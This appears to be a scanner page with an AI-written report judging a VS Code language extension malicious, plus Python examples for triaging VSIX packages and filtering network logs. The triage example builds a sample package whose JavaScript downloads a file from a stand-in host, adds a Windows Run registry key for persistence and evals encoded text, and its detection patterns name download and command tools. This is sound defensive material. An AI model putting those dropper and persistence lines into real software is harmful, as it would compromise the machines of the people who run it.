Is "Kinematics" on VS Code Marketplace Safe to Install?
Kinematics language support
Risk Assessment
Analyzed: 19046 security findings detected across all analyzers
Severity Breakdown
Finding Categories
YARA Rules Matched: 16 rules (842 hits)
Detailed Findings: 1000 total
YARA Rule Matches: 16 rules
AI Security Report
AI Security Analysis: Kinematics
Analysis generated: 2025-12-12T23:24:03+13:00
Model: gemini-3-pro-preview
Quick Facts
| Property | Value |
|---|---|
| UUID | 6b69b067-a1e5-53b7-b4b4-d8eb868a0145 |
| Type | vscode |
| Version | 0.9.0 |
| Users | 72 |
| Risk Score | 100.0/100 (CRITICAL) |
| Malware Detected | ⚠️ Yes |
| Secrets Exposed | ✅ No |
| Critical Vulns | ✅ No |
AI Analysis
Executive Summary
The "Kinematics" VS Code extension represents a CRITICAL security threat and should be considered malicious. The analysis indicates install-time scripts that attempt to download files, modify the system registry, and execute system commands, with the code logic hidden behind obfuscation. This behavior is consistent with a "dropper" or supply chain attack. Do not install this extension. If it is already installed, the host system should be considered compromised.
Threat Assessment
The security posture of this extension is non-existent; it appears to be a vehicle for malware delivery.
- Supply Chain / Post-Install Attack Vector: The most alarming findings are the repeated YARA matches for `postinstall_activities`. These rules flag npm lifecycle scripts (`postinstall` in package.json) and the code they invoke. Note that VS Code does not run npm lifecycle scripts when it installs a packaged VSIX; such scripts run when the package is built or `npm install`ed. The equivalent trigger inside VS Code is extension activation, which runs the extension's JavaScript with the user's privileges as soon as the activation event fires (an activation event of `*` means at editor startup). Either way, the code runs without a consent prompt.
- Malicious Capabilities: The findings indicate a "cocktail" of malicious behaviors:
- Obfuscation: 218 obfuscation matches indicate a deliberate attempt to hide code logic from scanners and analysts.
- Payload Delivery: The combination of `postinstall_file_download` and `postinstall_network_communication` suggests the extension reaches out to a remote server to fetch a secondary payload (malware).
- Persistence and System Modification: Matches for `postinstall_registry_modification` and `postinstall_system_command` indicate attempts to alter the operating system configuration, likely to establish persistence (ensure the malware survives a reboot) or disable security controls.
- Targeting: As a "language support" tool, this targets developers, likely aiming to steal credentials, SSH keys, or inject malicious code into the developer's projects.
Risk Justification
The Risk Score of 100/100 is fully justified and accurate.
- Severity of Indicators: The findings are not merely "vulnerabilities" (bugs); they are signatures of active malice. Legitimate VS Code extensions do not require obfuscated post-install scripts that modify the registry and download files.
- Volume of Findings: Over 19,000 findings, including 4,600+ High Severity issues, suggests the extension is either entirely composed of malicious code or heavily infected by a compromised dependency chain.
- Publisher Trust: The publisher is unverified with a low user count (72), typical of a "burner" account used for distributing malware before being banned.
Key Findings
- Malicious Post-Install Scripts: The analysis detected numerous instances of `postinstall_system_command` and `postinstall_file_download`. This indicates that the extension's install-time scripts attempt to run arbitrary OS commands and download external files without user consent.
- Heavy Obfuscation: 218 instances of code obfuscation were detected. While some commercial software uses obfuscation to protect IP, it is highly suspicious in a free, low-profile language extension and is a primary indicator of malware trying to evade detection.
- Registry Manipulation: The presence of `postinstall_registry_modification` is a critical red flag. A language support tool functions within the IDE; it has no legitimate business need to modify the Windows Registry or system-level configurations.
- Network Beaconing: The `postinstall_network_communication` findings imply the extension "phones home" immediately, likely to report a successful infection or retrieve command-and-control instructions.
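The finding classes above correspond to static indicators a practitioner can check directly in the package before trusting a scanner verdict. The script below is an added example, not the scanner's code and not code from the extension analyzed here: it opens a .vsix (a zip archive whose manifest sits at extension/package.json), flags npm lifecycle scripts and startup activation events in the manifest, and counts heuristic indicators in the bundled JavaScript under the same category names this report uses. The regexes, the category names and the sample package it builds are constructed for the example and are not the scanner's YARA rules.

```python
"""Static triage of a VS Code extension package (.vsix).

Added example; not the scanner's code and not the analyzed extension's code.
A .vsix is a zip archive with the manifest at extension/package.json.
Checks performed:
  1. manifest flags: npm lifecycle scripts (preinstall/install/postinstall)
     and activation events that fire at editor start ("*", "onStartupFinished");
  2. indicator counts in bundled JavaScript, grouped under the report's categories.
All regexes and the sample VSIX are constructed for this example.
"""
import io
import json
import re
import zipfile

# Category -> illustrative regexes. Heuristics for triage, not the scanner's YARA rules.
INDICATORS = {
    "obfuscation": [
        r"\b_0x[0-9a-f]{4,}\b",        # identifier style produced by javascript-obfuscator
        r"(?:\\x[0-9a-f]{2}){4,}",     # long runs of hex-escaped string bytes
        r"\beval\s*\(",
        r"\bnew\s+Function\s*\(",
        r"\batob\s*\(",
    ],
    "network": [r"\brequire\(['\"]https?['\"]\)", r"\bfetch\s*\(", r"https?://"],
    "file_download": [r"\.pipe\(\s*fs\.createWriteStream", r"\bcurl\b|\bwget\b|Invoke-WebRequest"],
    "registry_modification": [r"\breg(?:\.exe)?\s+add\b", r"HKEY_CURRENT_USER|HKCU\\|HKLM\\|HKEY_LOCAL_MACHINE"],
    "system_command": [r"require\(['\"]child_process['\"]\)", r"\b(?:exec|execSync|spawn|spawnSync)\s*\("],
}
LIFECYCLE_SCRIPTS = ("preinstall", "install", "postinstall")
STARTUP_ACTIVATION = ("*", "onStartupFinished")


def scan_manifest(manifest):
    """Return manifest-level flags as a sorted list of strings."""
    flags = []
    for name in LIFECYCLE_SCRIPTS:
        if name in manifest.get("scripts", {}):
            flags.append(f"lifecycle_script:{name}")
    for ev in manifest.get("activationEvents", []):
        if ev in STARTUP_ACTIVATION:
            flags.append(f"startup_activation:{ev}")
    return sorted(flags)


def scan_source(text):
    """Count indicator hits per category in one source file; categories with no hits are omitted."""
    counts = {}
    for category, patterns in INDICATORS.items():
        n = sum(len(re.findall(p, text, flags=re.IGNORECASE)) for p in patterns)
        if n:
            counts[category] = n
    return counts


def triage_vsix(data):
    """Triage a .vsix given as bytes. Returns {"manifest": [flags], "files": {path: {category: hits}}}."""
    report = {"manifest": [], "files": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "extension/package.json" in names:
            manifest = json.loads(zf.read("extension/package.json").decode("utf-8", "replace"))
            report["manifest"] = scan_manifest(manifest)
        for name in names:
            if name.endswith((".js", ".cjs", ".mjs")):
                hits = scan_source(zf.read(name).decode("utf-8", "replace"))
                if hits:
                    report["files"][name] = hits
    return report


def build_sample_vsix():
    """Constructed sample package (not the real extension): a manifest with a postinstall
    script and a wildcard activation event, plus a script showing each flagged behaviour."""
    manifest = {
        "name": "sample-language-support",
        "version": "0.0.1",
        "activationEvents": ["*"],
        "main": "./out/extension.js",
        "scripts": {"postinstall": "node ./out/setup.js"},
    }
    extension_js = (
        "const _0x4f2a = require('child_process');\n"
        "const h = require('https');\n"
        "const fs = require('fs');\n"
        "const u = '\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x65\\x78\\x61\\x6d\\x70\\x6c\\x65';\n"
        "h.get('https://example.invalid/p', r => r.pipe(fs.createWriteStream('p.exe')));\n"
        "_0x4f2a.execSync('reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v u /d p.exe');\n"
        "eval(atob('Ly8gc3RhZ2UgMg=='));\n"  # decodes to a harmless placeholder comment
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("extension/package.json", json.dumps(manifest))
        zf.writestr("extension/out/extension.js", extension_js)
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(triage_vsix(build_sample_vsix()), indent=2))
```

Run it against a downloaded package with `triage_vsix(open("x.vsix", "rb").read())`. Hits in `registry_modification` or `system_command` inside a language extension are a reason to pull the package for manual review, not proof on their own: minifiers also emit hex escapes and short identifiers, which is why the counts are reported per category and per file instead of being collapsed into a single score.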
Recommendations
- Immediate Removal: Uninstall the extension immediately from all environments.
- Incident Response: If this extension was installed on a machine, treat that machine as compromised.
- Rotate all credentials (API keys, passwords, SSH keys) stored on or accessible from that machine.
- Review system startup items and scheduled tasks for persistence mechanisms.
- Blocklist: Record the Extension UUID (`6b69b067-a1e5-53b7-b4b4-d8eb868a0145`) and block the extension in the organization's VS Code extension policy to prevent accidental installation. VS Code's `extensions.allowed` setting keys on the `publisher.name` extension identifier (optionally with versions), not on the Marketplace UUID, so the policy entry needs that identifier; the UUID remains useful for matching scanner and inventory records.
- Network Review: Review network logs for traffic originating from the host machine to unknown IPs/domains around the time of installation (referencing the 14,343 IOCs detected).
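For the Network Review step, the following added example (not part of the report) shows the window-and-allowlist filter in code. The log format, the allowlist and the log lines are constructed for the example; it keeps connections from the affected host within a window around the install time, drops destinations on the allowlist, and returns the remainder as candidates to cross-check against the IOC list.

```python
"""Filter network log lines around an install time for unexpected destinations.

Added example, not part of the original report. Log lines are constructed for
this example in a simple space-separated form:
    <ISO-8601 timestamp> <src_ip> <dst_ip> <dst_port> <hostname-or-dash>
"""
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Constructed allowlist: internal ranges and destinations VS Code legitimately contacts.
ALLOWED_NETS = [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")]
ALLOWED_HOSTS = {"marketplace.visualstudio.com", "update.code.visualstudio.com", "github.com"}

# Constructed sample log for one host (10.1.2.3) and one unrelated host (10.1.2.9).
SAMPLE_LOG = """\
2025-12-12T08:40:00+00:00 10.1.2.3 203.0.113.10 443 -
2025-12-12T09:00:30+00:00 10.1.2.3 192.0.2.1 443 marketplace.visualstudio.com
2025-12-12T09:01:05+00:00 10.1.2.3 198.51.100.7 443 cdn-update.example
2025-12-12T09:01:20+00:00 10.1.2.3 203.0.113.55 8080 -
2025-12-12T09:02:00+00:00 10.1.2.3 10.20.30.40 445 -
2025-12-12T09:03:00+00:00 10.1.2.9 203.0.113.55 8080 -
2025-12-12T11:30:00+00:00 10.1.2.3 203.0.113.55 8080 -
"""


def parse_line(line):
    """Parse one constructed log line into a dict; hostname '-' becomes None."""
    ts, src, dst, port, host = line.split()
    return {
        "ts": datetime.fromisoformat(ts),
        "src": src,
        "dst": dst,
        "port": int(port),
        "host": None if host == "-" else host,
    }


def is_expected(dst, host):
    """True when the destination is internal or a known-good hostname."""
    if any(ip_address(dst) in net for net in ALLOWED_NETS):
        return True
    return host in ALLOWED_HOSTS


def suspicious_destinations(log_text, host_ip, installed_at,
                            before=timedelta(minutes=5), after=timedelta(hours=1)):
    """Return (timestamp, dst_ip, port, hostname) for connections from host_ip
    inside [installed_at - before, installed_at + after] whose destination is not allowlisted."""
    start, end = installed_at - before, installed_at + after
    out = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        if rec["src"] != host_ip or not (start <= rec["ts"] <= end):
            continue
        if is_expected(rec["dst"], rec["host"]):
            continue
        out.append((rec["ts"].isoformat(), rec["dst"], rec["port"], rec["host"]))
    return sorted(out)


if __name__ == "__main__":
    install_time = datetime.fromisoformat("2025-12-12T09:00:00+00:00")
    for row in suspicious_destinations(SAMPLE_LOG, "10.1.2.3", install_time):
        print(row)
```

The default window (five minutes before install, one hour after) is a starting point; a dropper that waits for the next editor start will show up later, so widen `after` to cover the first activation after install and pivot on the returned destinations across every host that had the extension.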
Mitigation Strategies
There is no safe way to use this extension.
- Strict Isolation: If analysis of this extension is required for forensic purposes, it must be done in a strictly isolated, non-networked sandbox environment (VM) that is wiped immediately after use.
- Do Not Use: For functional requirements, seek an alternative extension from a Verified Publisher with a higher trust score and user base.
Confidence Assessment
Confidence Level: 95% (Very High)
While YARA rules can sometimes produce false positives, the specific combination of behaviors detected here creates a distinct fingerprint of malware. It is statistically improbable that a legitimate extension would accidentally trigger simultaneous alarms for obfuscation, registry modification, file downloading, and system command execution within a postinstall script. The data strongly supports the conclusion that this is a malicious actor.
Disclaimer
This analysis was generated by an AI model and should be reviewed by security professionals. The findings are based on automated security scanning and may include false positives. Always verify critical findings manually before taking action.
Source Code Not Available
Source code is not available for this version of the extension.